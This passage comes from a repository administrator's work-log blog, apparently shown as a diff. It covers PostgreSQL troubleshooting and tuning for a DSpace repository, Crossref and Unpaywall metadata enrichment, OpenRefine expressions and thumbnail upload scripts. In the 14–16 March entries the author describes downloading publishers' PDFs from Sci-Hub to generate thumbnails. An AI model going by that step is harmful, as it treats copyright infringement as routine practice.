at org.flywaydb.core.internal.database.DefaultExecutionStrategy.execute(DefaultExecutionStrategy.java:27)
at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.execute(SqlMigrationExecutor.java:57)
at org.flywaydb.core.internal.command.DbMigrate.doMigrateGroup(DbMigrate.java:377)
... 24 more
Caused by: org.postgresql.util.PSQLException: ERROR: relation "resourcepolicy_action_idx" already exists
at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2676)
at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2366)
at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:356)
at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:496)
at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:413)
at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:333)
at org.postgresql.jdbc.PgStatement.executeCachedSql(PgStatement.java:319)
at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:295)
at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:290)
at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:193)
at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:193)
at org.flywaydb.core.internal.jdbc.JdbcTemplate.executeStatement(JdbcTemplate.java:201)
at org.flywaydb.core.internal.sqlscript.ParsedSqlStatement.execute(ParsedSqlStatement.java:95)
at org.flywaydb.core.internal.sqlscript.DefaultSqlScriptExecutor.executeStatement(DefaultSqlScriptExecutor.java:210)
... 30 more
```
- I dropped that index and then the migration succeeded:
```console
localhost/dspace7= ☘ DROP INDEX resourcepolicy_action_idx;
localhost/dspace7= ☘ \q
$ ./bin/dspace database migrate ignored
Done.
```
- I think that particular error is because I applied the [indexes in this unmerged DSpace 6 patch](https://github.com/DSpace/DSpace/pull/1792), so I don't need to report this as an error in DSpace 7
## 2023-02-16
- I found a suspicious number of PostgreSQL locks on CGSpace and decided to investigate:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
44 dspaceApi
372 dspaceCli
446 dspaceWeb
```
- This started happening yesterday and I killed a few locks that were several hours old after inspecting the `locks-age.sql` output
- I also checked the `locks.sql` output, which helpfully lists the blocked PID and the blocking PID, to find one blocking PID that was idle in transaction
- I killed that process and then all other locks were instantly processed
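- A query along these lines shows each blocked PID together with the PIDs blocking it (a sketch, not necessarily what's in my `locks.sql`):

```console
$ psql -c "SELECT pid, pg_blocking_pids(pid) AS blocked_by, state, wait_event_type, query FROM pg_stat_activity WHERE cardinality(pg_blocking_pids(pid)) > 0;" | less -S
```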
- I filed [a GitHub issue](https://github.com/DSpace/dspace-angular/issues/2103) on dspace-angular requesting the item view to use the bitstream description instead of the file name if present
- Weekly CG Core types meeting
- I need to go through the actions and remove those items that are only for CGSpace internal use, ie:
- CD-ROM
- Manuscript-unpublished
- Photo Report
- Questionnaire
- Wiki
- Weekly CGIAR Repository Working Group meeting
- I did some experiments with Crossref dates for about 20,000 DOIs in CGSpace using my `crossref-doi-lookup.py` script
- Some things I noted from reading the [Crossref API docs](https://github.com/CrossRef/rest-api-doc/blob/master/api_format.md) and inspecting the records for a few dozen DOIs manually:
- `["created"]["date-parts"]` → Date on which the DOI was first registered (not useful for us)
- `["published-print"]["date-parts"]` → Date on which the work was published in print
- `["journal-issue"]["published-print"]["date-parts"]` → When present, is 99% the same as the above
- `["published-online"]["date-parts"]` → Date on which the work was published online
- `["journal-issue"]["published-online"]["date-parts"]` → Much more rare, and only 50% the same as the above, so unreliable
- `["issued"]["date-parts"]` → Earliest of published-print and published-online (not useful to us)
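- For example, fetching a single DOI from the Crossref REST API and pulling out those two date fields looks roughly like this (`$DOI` is a placeholder):

```console
$ curl -s "https://api.crossref.org/works/$DOI" \
    | jq '.message | {"published-print": .["published-print"]["date-parts"], "published-online": .["published-online"]["date-parts"]}'
```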
- After checking the DOIs manually I decided that when the `published-print` date exists, it is usually more accurate than our issued dates
- I set 12,300 issue dates to those from Crossref
- I also decided that, when `published-online` exists, it is usually accurate when I check the publisher page (we don't have many online dates to compare)
- I set the available date for ~7,000 items to the published-online date as long as:
- There was no `dcterms.available` date already
- It was different than the issued date, because for now I only want online dates that are different, in case this is an online only journal in which case that can be the issue date... maybe I'll re-visit that later
## 2023-02-17
- It seems some (all?) of the changes I applied to dates last night didn't get saved...
- I don't know what happened, so I will run them again after some investigation
- I submitted the first batch of ~7,600 changes and it took twelve hours!
- I almost cancelled it because after applying the changes there was a lock blocking everything for two hours, and it seemed to be stuck, but I kept checking it and saw that the `query_start` and `state_change` were being updated despite it being state "idle in transaction":
```console
$ psql -c 'SELECT * FROM pg_stat_activity WHERE pid=1025176' | less -S
```
- I will apply the other changes in smaller batches...
- Lately I've noticed a lot of activity from the country code tagger curation task
- Looking in the logs I see items being tagged that are very old and should have already been tagged years ago
- Also, I see a ton of these errors whenever the task is updating an item:
```console
2023-02-17 08:01:00,252 INFO org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/89020 with status: 0. Result: '10568/89020: added 1 alpha2 country code(s)'
2023-02-17 08:01:00,467 ERROR com.atmire.versioning.ModificationLogger @ Error while writing item to versioning index: a0fe9d9a-6ac1-4b6a-8fcb-dae07a6bbf58 message:missing required field: epersonID
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: missing required field: epersonID
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:116)
at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:102)
at com.atmire.versioning.ModificationLogger.indexItem(ModificationLogger.java:263)
at com.atmire.versioning.ModificationConsumer.end(ModificationConsumer.java:134)
at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:157)
at org.dspace.core.Context.dispatchEvents(Context.java:455)
at org.dspace.curate.Curator.visit(Curator.java:541)
at org.dspace.curate.Curator$TaskRunner.run(Curator.java:568)
at org.dspace.curate.Curator.doCollection(Curator.java:515)
at org.dspace.curate.Curator.doCommunity(Curator.java:487)
at org.dspace.curate.Curator.doSite(Curator.java:451)
at org.dspace.curate.Curator.curate(Curator.java:269)
at org.dspace.curate.Curator.curate(Curator.java:203)
at org.dspace.curate.CurationCli.main(CurationCli.java:220)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
```
- This must be related...
## 2023-02-18
- I realized why the country-code-tagger was tagging everything: I had overridden the `force` parameter last week!
- Start a harvest on AReS
## 2023-02-20
- IWMI is concerned that some of their items with top Altmetric attention scores don't show up in the AReS Explorer
- I looked into it for one and found that AReS is using the Handle, but Altmetric hasn't associated the Handle with the DOI
- Looking into country and region issues for the PRMS team
- Last week they had some questions about some invalid countries that ended up being typos
- I realized my cgspace-java-helpers country-code-tagger curation task is not using the latest version, so it was missing Türkiye
- I compiled the new version and ran it manually, but I have to upload a new version to Maven Central and then update the dependency in `dspace/modules/additions/pom.xml` ughhhhhh
- I tagged version 6.2 with the change for Türkiye and uploaded it to Maven Central with `mvn clean deploy`
- I'm having second thoughts about switching to UN M.49 for countries because there are just too many tradeoffs
- I want to find a way to keep our existing list, and codify some rules for it
- There are several discussions related to the shortcomings of ISO themselves and the iso-codes project, for example:
- [Inconsistency with articles in ISO-3166-1 English short names](https://salsa.debian.org/iso-codes-team/iso-codes/-/issues/33) (this one was filed by me two years ago!)
- [ISO 3166-1: What's the policy for `common_name`?](https://salsa.debian.org/iso-codes-team/iso-codes/-/issues/44)
- I almost want to say fuck it, let's just use iso-codes and tell everyone to deal with it, but make sure we handle ISO 3166-1 Alpha2 or probably Alpha3 in the future
- Something like:
- Prefer `common_name` if it exists
- Prefer the shorter of `name` and `official name`
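- A rough sketch of that rule with `jq` against the iso-codes JSON (assuming the Debian file layout):

```console
$ jq -r '."3166-1"[] | .common_name // ([.name, (.official_name // .name)] | min_by(length))' \
    /usr/share/iso-codes/json/iso_3166-1.json | sort | head
```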
## 2023-02-21
- Continue working on my `parse-iso-codes.py` script to parse the iso-codes JSON for ISO 3166-1
- I also started a spreadsheet to track current CGSpace country names, proposed new names using the compromise above, and UN M.49 names
- I proposed this to Peter but he wasn't happy because there are still some stupidly long and political names there
- I bumped the version of cgspace-java-helpers to 6.2-SNAPSHOT and pushed it to Maven Central because I can't figure out how to get non-snapshot releases to go there
- Ouch, grunt 1.6.0 was released a few weeks ago, which relies on Node.js v16, thus breaking the Mirage 2 build in DSpace 6
- I filed [an issue in DSpace](https://github.com/DSpace/DSpace/issues/8676)
- Help Moises from CIP troubleshoot harvesting issues on their WordPress site
- I see 2,000 requests with the user agent "RTB website BOT" today and they are all HTTP 200:
```console
# grep 'RTB website BOT' /var/log/nginx/rest.log | awk '{print $9}' | sort | uniq -c | sort -h
2023 200
```
- Start reviewing and fixing metadata for Sam's ~250 CAS publications from last year
- Both Abenet and Peter have already looked at them and Sam has been waiting for months on this
## 2023-02-22
- Continue proofing CAS records for Sam
- I downloaded all the PDFs manually and checked the issue dates for each from the PDF, noting some that had licenses, ISBNs, etc
- I combined the title, abstract, and system subjects into one column to mine them for AGROVOC terms:
```console
toLowercase(value) + toLowercase(cells["dcterms.abstract"].value) + toLowercase(cells["cg.subject.system"].value.replace("||", " "))
```
- Then I extracted a list of AGROVOC terms the same way I did in [August, 2022]({{< relref "2022-08.md" >}}) and used this Jython code to extract matching terms:
```python
import re

with open(r"/tmp/agrovoc-subjects.txt", 'r') as f:
    terms = [name.rstrip().lower() for name in f]

return "||".join([term for term in terms if re.match(r".*\b" + term + r"\b.*", value.lower())])
```
- Then I used [this cool Jython to remove duplicate metadata values](https://stackoverflow.com/questions/15419080/openrefine-remove-duplicates-from-list-with-jython):
```python
deduped_list = list(set(value.split("||")))
return '||'.join(map(str, deduped_list))
```
- Then I did the same with countries, woooooo!
- I checked for duplicates and found forty-one
- I just stumbled upon UNTERM, which provides the official list of countries for the UN General Assembly, including a downloadable Excel with the short and formal names in all UN languages: https://unterm.un.org/unterm2/en/country
- I created a [pull request to add common names for Iran, Laos, and Syria on the Debian iso-codes package](https://salsa.debian.org/iso-codes-team/iso-codes/-/merge_requests/32)
- These are remarked upon in the ISO.org online browsing platform for ISO 3166-1
## 2023-02-23
- Tag v0.6.1 of csv-metadata-quality
- Weekly meeting about CG Core types
- I need to get some definitions from Peter for some types
- Peter sent some of the feedback from Indira to XMLUI
- I removed some old facets, limited others to fewer values, and adjusted the recent submissions from 5 to 10
## 2023-02-24
- More work on understanding Sam's CAS publications to prepare for uploading them to CGSpace
- I need to reconcile the duplicates and Peter's type re-classifications in the final version of the spreadsheet
- I flagged all the duplicates by creating a custom text facet matching all their titles like:
```console
or(
isNotNull(value.match("Evaluation of the CGIAR Research Program on Climate Change, Agriculture and Food Security (CCAFS)")),
isNotNull(value.match("Report of the IEA Workshop on Development, Use and Assessment of TOC in CGIAR Research, Rome, 12-13 January 2017")),
isNotNull(value.match("Report of the IEA Workshop on Evaluating the Quality of Science, Rome, 10-11 December 2015")),
isNotNull(value.match("Review of CGIARs Intellectual Assets Principles")),
...
)
```
- Annoyingly this seems to miss the ones with parentheses so I had to do those manually
- This matched thirty-seven items, then I flagged them so I can handle them separately after uploading the others
- Then I used the URL field in the old version of the file to match the items with types `Evaluation` and `Independent Commentary` since Peter changed them
- I added extent, volume, issue, number, and affiliation to a few journal articles
- Then I did some last minute checks to make sure we're not uploading files for items marked as having "multiple documents"
## 2023-02-25
- Oh nice, my [pull request adding common names for Iran, Laos, and Syria to iso-codes](https://salsa.debian.org/iso-codes-team/iso-codes/-/merge_requests/32) was merged
- I did a test import of the 198 CAS Publications on DSpace Test, then inspected Abenet's file with Gaia's "multiple documents" field one more time and decided to do the import on CGSpace
- Gaia's "multiple documents" column had some text like "E6" and "F7" that didn't make any sense, and those files were not even in the SharePoint
## 2023-02-26
- Start a harvest on AReS
## 2023-02-27
- I found two items for the CAS Publications that were marked as duplicates, but upon second inspection were not, so I uploaded them to CGSpace
- That makes the total number of items for CAS 200...
- I did some CSV joining and inspections with the remaining thirty-six duplicates with the metadata for their existing items on CGSpace and uploaded them
- Do some work on the new DSpace 7 submission forms
- I ended up reverting to the stock configuration to use some new techniques like the style and type bind
## 2023-02-28
- Keep working on the DSpace 7 submission forms
- As part of this I asked Maria and Francesca if they are still using the `cg.link.permalink` (Bioversity publications permalink) and they said no, so we can remove it from the submission form
- I also removed `cg.subject.ccafs` since the CRP ended over a year ago and `cg.subject.pabra` since there have only been a handful of new items in [their collection](https://hdl.handle.net/10568/80211) and they seem to be using Alliance subjects instead
- I filed [a bug](https://github.com/DSpace/DSpace/issues/8686) on DSpace regarding the inability to add freetext values from an input field that uses a vocabulary
<!-- vim: set sw=2 ts=2: -->

655
content/posts/2023-03.md Normal file

@ -0,0 +1,655 @@
---
title: "March, 2023"
date: 2023-03-01T07:58:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-03-01
- Remove `cg.subject.wle` and `cg.identifier.wletheme` from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)
- [iso-codes 4.13.0 was released](https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28), which incorporates my changes to the common names for Iran, Laos, and Syria
- I finally got through with porting the input form from DSpace 6 to DSpace 7
<!--more-->
- I can't put my finger on it, but the input form has to be formatted very particularly, for example if your rows have more than two fields in them without a sufficient Bootstrap grid style, or if you use a `twobox`, etc, the entire form step appears blank
## 2023-03-02
- I did some experiments with the new [Pandas 2.0.0rc0 Apache Arrow support](https://datapythonista.me/blog/pandas-20-and-the-arrow-revolution-part-i)
- There is a change to the way nulls are handled and it causes my tests for `pd.isna(field)` to fail
- I think we need to consider blanks as null, but I'm not sure
- I made some adjustments to the Discovery sidebar facets on DSpace 6 while I was looking at the DSpace 7 configuration
- I downgraded CIFOR subject, Humidtropics subject, Drylands subject, ICARDA subject, and Language from DiscoverySearchFilterFacet to DiscoverySearchFilter in `discovery.xml` since we are no longer using them in sidebar facets
## 2023-03-03
- Atmire merged one of my old pull requests into COUNTER-Robots:
- [COUNTER_Robots_list.json: Add new bots](https://github.com/atmire/COUNTER-Robots/pull/54)
- I will update the local ILRI overrides in our DSpace spider agents file
## 2023-03-04
- Submit a [pull request on pycountry to use iso-codes 4.13.0](https://github.com/flyingcircusio/pycountry/pull/156)
## 2023-03-05
- Start a harvest on AReS
## 2023-03-06
- Export CGSpace to do Initiative collection mappings
- There were thirty-three that needed updating
- Send Abenet and Sam a list of twenty-one CAS publications that had been marked as "multiple documents" that we uploaded as metadata-only items
- Goshu will download the PDFs for each and upload them to the items on CGSpace manually
- I spent some time trying to get csv-metadata-quality working with the new Arrow backend for Pandas 2.0.0rc0
- It seems there is a problem recognizing empty strings as na with `pd.isna()`
- If I do `pd.isna(field) or field == ""` then it works as expected, but that feels hacky
- I'm going to test again on the next release...
- Note that I had been setting both of these global options:
```python
pd.options.mode.dtype_backend = 'pyarrow'
pd.options.mode.nullable_dtypes = True
```
- Then reading the CSV like this:
```python
df = pd.read_csv(args.input_file, engine='pyarrow', dtype='string[pyarrow]')
```
## 2023-03-07
- Create a PostgreSQL 14 instance on my local environment to start testing compatibility with DSpace 6 as well as all my scripts:
```console
$ podman pull docker.io/library/postgres:14-alpine
$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:14-alpine
$ createuser -h localhost -p 5432 -U postgres --pwprompt dspacetest
$ createdb -h localhost -p 5432 -U postgres -O dspacetest --encoding=UNICODE dspacetest
```
- Peter sent me a list of items that had an ILRI affiliation on Altmetric, but that didn't have Handles
- I ran a duplicate check on them to find if they exist or if we can import them
- There were about ninety matches, but a few dozen of those were pre-prints!
- After excluding those there were about sixty-one items we already have on CGSpace so I will add their DOIs to the existing items
- After joining these with the records from CGSpace and inspecting the DOIs I found that only forty-four were new DOIs
- Surprisingly, some of the DOIs from Altmetric were not working, though some of ours were not working either (specifically, the Journal of Agricultural Economics seems to have reassigned DOIs)
- For the rest of the ~359 items I extracted their DOIs and looked up the metadata on Crossref using my `crossref-doi-lookup.py` script
- After spending some time cleaning the data in OpenRefine I realized we don't get access status from Crossref
- We can infer it if the item is Creative Commons, but otherwise I might be able to use [Unpaywall's API](https://unpaywall.org/products/api)
- I found some false positives in Unpaywall, so I might only use their data when it says the DOI is not OA...
- During this process I updated my `crossref-doi-lookup.py` script to get more information from Crossref like ISSNs, ISBNs, full journal title, and subjects
- An unscientific comparison of duplicate checking Peter's file with ~500 titles on PostgreSQL 12 and PostgreSQL 14:
- PostgreSQL 12: `0.11s user 0.04s system 0% cpu 19:24.65 total`
- PostgreSQL 14: `0.12s user 0.04s system 0% cpu 18:13.47 total`
## 2023-03-08
- I am wondering how to speed up PostgreSQL trgm searches more
- I see my local PostgreSQL is using vanilla configuration and I should update some configs:
```console
localhost/dspacetest= ☘ SELECT setting, unit FROM pg_settings WHERE name = 'shared_buffers';
setting │ unit
─────────┼──────
16384 │ 8kB
(1 row)
```
- I re-created my PostgreSQL 14 container with some extra memory settings:
```console
$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:14-alpine -c shared_buffers=1024MB -c random_page_cost=1.1
```
- Then I created a GiST [index on the `metadatavalue` table to try to speed up the trgm similarity operations](https://alexklibisz.com/2022/02/18/optimizing-postgres-trigram-search):
```console
localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gist_idx ON metadatavalue USING gist(text_value gist_trgm_ops(siglen=64)); # \di+ shows index size is 795MB
```
- That took a few minutes to build... then the duplicate checker ran in 12 minutes: `0.07s user 0.02s system 0% cpu 12:43.08 total`
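- For context, these trgm indexes are meant to speed up similarity queries roughly like this (a sketch with an example title and threshold; the duplicate checker's actual query may differ):
```console
localhost/dspacetest= ☘ SET pg_trgm.similarity_threshold = 0.6;
localhost/dspacetest= ☘ SELECT text_value FROM metadatavalue WHERE text_value % 'Some example title to check';
```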
- On a hunch, I tried with a GIN index:
```console
localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gin_idx ON metadatavalue USING gin(text_value gin_trgm_ops); # \di+ shows index size is 274MB
```
- This ran in 19 minutes: `0.08s user 0.01s system 0% cpu 19:49.73 total`
- So clearly the GiST index is better for this task
- I am curious what happens if I increase the signature length in the GiST index from 64 to 256 (which will surely increase the index size):
```console
localhost/dspacetest= ☘ CREATE INDEX metadatavalue_text_value_trgm_gist_idx ON metadatavalue USING gist(text_value gist_trgm_ops(siglen=256)); # \di+ shows index size is 716MB, which is less than the previous GiST index...
```
- This one finished in ten minutes: `0.07s user 0.02s system 0% cpu 10:04.04 total`
- I might also want to [increase my `work_mem`](https://stackoverflow.com/questions/43008382/postgresql-gin-index-slower-than-gist-for-pg-trgm) (default 4MB):
```console
localhost/dspacetest= ☘ SELECT setting, unit FROM pg_settings WHERE name = 'work_mem';
setting │ unit
─────────┼──────
4096 │ kB
(1 row)
```
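- If I do increase it, I can test it per session first, for example (the value here is just a guess):
```console
localhost/dspacetest= ☘ SET work_mem = '64MB';
```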
- After updating my Crossref lookup script and checking the remaining ~359 items I found eight more duplicates already existing on CGSpace
- Wow, I found a [really cool way to fetch URLs in OpenRefine](https://programminghistorian.org/en/lessons/fetch-and-parse-data-with-openrefine#example-1-fetching-and-parsing-html)
- I used this to fetch the open access status for each DOI from Unpaywall
- First, create a new column called "url" based on the DOI that builds the request URL. I used a Jython expression:
```python
unpaywall_baseurl = 'https://api.unpaywall.org/v2/'
email = "a.orth+unpaywall@cgiar.org"
doi = value.replace("https://doi.org/", "")
request_url = unpaywall_baseurl + doi + '?email=' + email
return request_url
```
- Then create a new column based on fetching the values in that column. I called it "unpaywall_status"
- Then you get a JSON blob in each cell and can extract the Open Access status with a GREL expression like `value.parseJson()['is_oa']`
- I checked a handful of results manually and found that the limited access status was more trustworthy from Unpaywall than the open access, so I will just tag the limited access ones
- I merged the funders and affiliations from Altmetric into my file, then used the same technique to get Crossref data for open access items directly into OpenRefine and parsed the abstracts
- The syntax was hairy because it's marked up with tags like `<jats:p>`, but this got me most of the way there:
```console
value.replace("jats:p", "jats-p").parseHtml().select("jats-p")[0].innerHtml()
value.replace("<jats:italic>","").replace("</jats:italic>", "")
value.replace("<jats:sub>","").replace("</jats:sub>", "").replace("<jats:sup>","").replace("</jats:sup>", "")
```
- I uploaded the 350 items to DSpace Test so Peter and Abenet can explore them
- I exported a list of authors, affiliations, and funders from the new items to let Peter correct them:
```console
$ csvcut -c dc.contributor.author /tmp/new-items.csv | sed -e 1d -e 's/"//g' -e 's/||/\n/g' | sort | uniq -c | sort -nr | awk '{$1=""; print $0}' | sed -e 's/^ //' > /tmp/new-authors.csv
```
- Meeting with FAO AGRIS team about how to detect duplicates
- They are currently using a sha256 hash on titles, which will work, but will only return exact matches
- I told them to try to normalize the string, drop stop words, etc to increase the possibility that the hash matches
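- Something like this minimal sketch of normalizing before hashing (purely illustrative, not what AGRIS actually does):
```python
import hashlib
import re

STOP_WORDS = {"a", "an", "and", "for", "in", "of", "on", "the"}

def title_hash(title: str) -> str:
    # Lowercase, strip punctuation, and drop stop words so trivially
    # different titles still produce the same hash
    words = re.sub(r"[^\w\s]", "", title.lower()).split()
    normalized = " ".join(word for word in words if word not in STOP_WORDS)
    return hashlib.sha256(normalized.encode("utf-8")).hexdigest()

# These two produce the same hash despite case and punctuation differences
print(title_hash("The effects of climate change on maize yields"))
print(title_hash("Effects of Climate Change on Maize Yields."))
```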
- Meeting with Abenet to discuss CGSpace issues
- She reminded me about needing a metadata field for first author when the affiliation is ILRI
- I said I prefer to write a small script for her that will check the first author and first affiliation... I could do it easily in Python (see the sketch below), but would need to put a web frontend on it for her
- Unless we could do that in AReS reports somehow
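- The idea would be something like this rough sketch (the column names and file are assumptions based on a CGSpace CSV export):
```python
import csv

# Print items where the first affiliation is ILRI, along with the first author
with open("cgspace-export.csv", newline="") as f:
    for row in csv.DictReader(f):
        authors = row.get("dc.contributor.author[en_US]", "").split("||")
        affiliations = row.get("cg.contributor.affiliation[en_US]", "").split("||")
        if affiliations[0] == "International Livestock Research Institute":
            print(f"{row['id']}: {authors[0]} ({affiliations[0]})")
```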
## 2023-03-09
- Apply a bunch of corrections to authors, affiliations, and donors on the new items on DSpace Test
- Meeting with Peter and Abenet about future OpenRXV developments, DSpace 7, etc
- I submitted an [issue on MEL asking them to add provenance metadata when submitting to CGSpace](https://github.com/CodeObia/MEL/issues/11173)
## 2023-03-10
- CKM is getting ready to launch their new website and they display CGSpace thumbnails at 255x362px
- Our thumbnails are 300px so they get up-scaled and look bad
- I realized that the last time we [increased the size of our thumbnails was in 2013](https://github.com/ilri/DSpace/commit/5de61e220124c1d0441c87cd7d36d18cb2293c03), from 94x130 to 300px
- I offered to CKM that we increase them again to 400 or 600px
- I did some tests to check the thumbnail file sizes for 300px, 400px, 500px, and 600px on [this item](https://hdl.handle.net/10568/126388):
```console
$ ls -lh 10568-126388-*
-rw-r--r-- 1 aorth aorth 31K Mar 10 12:42 10568-126388-300px.jpg
-rw-r--r-- 1 aorth aorth 52K Mar 10 12:41 10568-126388-400px.jpg
-rw-r--r-- 1 aorth aorth 76K Mar 10 12:43 10568-126388-500px.jpg
-rw-r--r-- 1 aorth aorth 106K Mar 10 12:44 10568-126388-600px.jpg
```
- It seems the 600px version has a 3 to 4 times larger file size, so maybe we should shoot for 400px or 500px
- I decided on 500px
- I started re-generating new thumbnails for the ILRI Publications, CGIAR Initiatives, and other collections
- On that note, I also re-worked the XMLUI item display to show larger thumbnails (from a max-width of 128px to 200px)
- And now that I'm looking at thumbnails I am curious what it would take to get DSpace to generate WebP or AVIF thumbnails
- Peter sent me citations and ILRI subjects for the 350 new ILRI publications
- I guess he edited it in Excel because there are a bunch of encoding issues with accents
- I merged Peter's citations and subjects with the other metadata, ran one last duplicate check (and found one item!), then ran the items through csv-metadata-quality and uploaded them to CGSpace
- In the end it was only 348 items for some reason...
## 2023-03-12
- Start a harvest on AReS
## 2023-03-13
- Extract a list of DOIs from the Creative Commons licensed ILRI journal articles that I uploaded last week, skipping any that are "no derivatives" (ND):
```console
$ csvgrep -c 'dc.description.provenance[en]' -m 'Made available in DSpace on 2023-03-10' /tmp/ilri-articles.csv \
| csvgrep -c 'dcterms.license[en_US]' -r 'CC(0|\-BY)' \
| csvgrep -c 'dcterms.license[en_US]' -i -r '\-ND\-' \
| csvcut -c 'id,cg.identifier.doi[en_US],dcterms.type[en_US]' > 2023-03-13-journal-articles.csv
```
- I want to write a script to download the PDFs and create thumbnails for them, then upload to CGSpace
- I wrote one based on `post_ciat_pdfs.py` but it seems there is an issue uploading anything other than a PDF
- When I upload a JPG or a PNG the file begins with:
```console
Content-Disposition: form-data; name="file"; filename="10.1017-s0031182013001625.pdf.jpg"
```
- ... this means the multipart header text ended up inside the file itself, so it is invalid
- I tried in both the `ORIGINAL` and `THUMBNAIL` bundle, and with different filenames
- I tried manually on the command line with `http` and both PDF and PNG work... hmmmm
- Hmm, this seems to have been due to some difference in behavior between the `files` and `data` parameters of `requests.get()` (see the sketch below)
- I finalized the `post_bitstreams.py` script and uploaded eighty-five PDF thumbnails
- It seems Bizu uploaded covers for a handful so I deleted them and ran them through the script to get proper thumbnails
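- A minimal sketch of the `files` versus `data` difference mentioned above (the endpoint and session cookie are illustrative, not exactly what `post_bitstreams.py` does):
```python
import requests

# Hypothetical DSpace REST bitstream data endpoint and session cookie
url = "https://dspacetest.cgiar.org/rest/bitstreams/384142cb-58b9-4e64-bcdc-0a8cc34888b3/data"
cookies = {"JSESSIONID": "2B40C7C4E34CEFCF5AFAE4B75A8C52E2"}

with open("10.1017-s0031182013001625.pdf.jpg", "rb") as f:
    # files= wraps the upload in multipart/form-data, so part headers like
    # "Content-Disposition: form-data; ..." end up inside the stored bitstream
    # r = requests.put(url, files={"file": f}, cookies=cookies)

    # data= sends the raw file bytes as the request body
    r = requests.put(url, data=f, cookies=cookies)
    print(r.status_code)
```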
## 2023-03-14
- Add twelve IFPRI authors to our controlled vocabulary for authors and ORCID identifiers
- I also tagged their existing items on CGSpace
- Export all our ORCIDs and resolve their names to see if any have changed:
```console
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-03-14-orcids.txt
$ ./ilri/resolve_orcids.py -i /tmp/2023-03-14-orcids.txt -o /tmp/2023-03-14-orcids-names.txt -d
```
- Then update them in the database:
```console
$ ./ilri/update_orcids.py -i /tmp/2023-03-14-orcids-names.txt -db dspace -u dspace -p 'fuuu' -m 247
```
## 2023-03-15
- Jawoo was asking about possibilities to harvest PDFs from CGSpace for some kind of AI chatbot integration
- I see we have 45,000 PDFs (format ID 2)
```console
localhost/dspacetest= ☘ SELECT COUNT(*) FROM bitstream WHERE NOT deleted AND bitstream_format_id=2;
count
───────
45281
(1 row)
```
- Rework some of my Python scripts to use a common `db_connect` function from util (a rough sketch of it is below)
- I reworked my `post_bitstreams.py` script to be able to overwrite bitstreams if requested
- The use case is to upload thumbnails for all the journal articles where we have these horrible pixelated journal covers
- I replaced JPEG thumbnails for ~896 ILRI publications by exporting a list of DOIs from the 10568/3 collection that were CC-BY, getting their PDFs from Sci-Hub, and then posting them with my new script
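- A rough sketch of what the shared `db_connect` helper looks like (the signature and defaults here are illustrative):
```python
import psycopg2

def db_connect(database, user, password, host="localhost", port=5432):
    """Return a PostgreSQL connection for the various ILRI scripts to share."""
    return psycopg2.connect(
        dbname=database, user=user, password=password, host=host, port=port
    )

# Example usage in a script:
# connection = db_connect("dspace", "dspace", "fuuu")
# with connection.cursor() as cursor:
#     cursor.execute("SELECT COUNT(*) FROM item")
```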
## 2023-03-16
- Continue working on the ILRI publication thumbnails
- There were about sixty-four that had existing PNG "journal cover" thumbnails that didn't get replaced because I only overwrote the JPEG ones yesterday
- Now I generated a list of those bitstream UUIDs and deleted them with a shell script via the REST API
- I made a [pull request on DSpace 7 to update the bitstream format registry for PNG, WebP, and AVIF](https://github.com/DSpace/DSpace/pull/8722)
- Export CGSpace to perform mappings to Initiatives collections
- I also used this export to find CC-BY items with DOIs that had JPEGs or PNGs in their provenance, meaning that the submitter likely submitted a low-quality "journal cover" for the item
- I found about 330 of them and got most of their PDFs from Sci-Hub and replaced the crappy thumbnails with real ones where Sci-Hub had them (~245)
- In related news, I realized you can get an [API key from Elsevier and download the PDFs from their API](https://stackoverflow.com/questions/59202176/python-download-papers-from-sciencedirect-by-doi-with-requests):
```python
import requests
api_key = 'fuuuuuuuuu'
doi = "10.1016/j.foodqual.2021.104362"
request_url = f'https://api.elsevier.com/content/article/doi:{doi}'
headers = {
    'X-ELS-APIKEY': api_key,
    'Accept': 'application/pdf'
}
